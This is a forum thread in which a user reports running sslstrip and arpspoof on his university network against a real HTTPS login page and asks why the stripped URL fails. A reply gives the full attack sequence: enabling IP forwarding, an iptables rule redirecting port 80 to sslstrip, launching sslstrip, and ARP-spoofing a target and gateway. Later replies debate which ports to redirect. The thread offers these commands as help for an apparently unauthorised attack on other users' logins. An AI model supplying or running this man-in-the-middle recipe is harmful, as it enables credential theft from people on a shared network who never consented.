Jump to content

Sslstrip Problem


darkn3ssking

Recommended Posts

hey guyz

i face real problem in sslstrip, i have run sslstrip and arpspoof in my university on my laptop backtrack machine, we have one ssl login like this https://golestan/ when i runned ssltrip the url has been changed to http://golestan:445 in victim machine and it didnt opened url anymore. anyone have experiment please help me,

i think the url could be change to http://golestan/ not http://golestan:445

tnx for quick response

Link to comment
Share on other sites

You should forward all port 80 to SSL strip.

http://www.thoughtcrime.org/software/sslstrip/

Running sslstrip

* Flip your machine into forwarding mode. (echo "1" > /proc/sys/net/ipv4/ip_forward)

* Setup iptables to redirect HTTP traffic to sslstrip. (iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port <listenPort>)

* Run sslstrip. (sslstrip.py -l <listenPort>)

* Run arpspoof to convince a network they should send their traffic to you. (arpspoof -i <interface> -t <targetIP> <gatewayIP>)

That should do it.

Link to comment
Share on other sites

You should forward all port 80 to SSL strip.

http://www.thoughtcrime.org/software/sslstrip/

Call me crazy (I do see the iptables chain listed in your quoted text from the site you linked and understand it), but wouldn't traffic destined for port 80 usually be in clear text anyway? Isn't it usually port 443 (Sometimes port 8080 I suppose) that you want to use SSL Strip on or am I missing something here?

Edited by mux
Link to comment
Share on other sites

Call me crazy (I do see the iptables chain listed in your quoted text from the site you linked and understand it), but wouldn't traffic destined for port 80 usually be in clear text anyway? Isn't it usually port 443 (Sometimes port 8080 I suppose) that you want to use SSL Strip on or am I missing something here?

You are correct, but doing just port 80 works. I think sslstrip connects via https port and just forwards clear text back to the user. It would be a question for the creator or watch his presentation. I mean, i guess for good measure you could add the other ports you feel necessary.

Link to comment
Share on other sites

You are correct, but doing just port 80 works. I think sslstrip connects via https port and just forwards clear text back to the user. It would be a question for the creator or watch his presentation. I mean, i guess for good measure you could add the other ports you feel necessary.

Gotcha. Once I started looking at that firewall rule it made more sense. I guess I am just too used to seeing FORWARD rules used locally to port forward on my router to even notice that the rule you quoted was using a PREROUTING rule when I scanned over it the first time. I guess that is an easy way to make myself look like an ass. :)

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...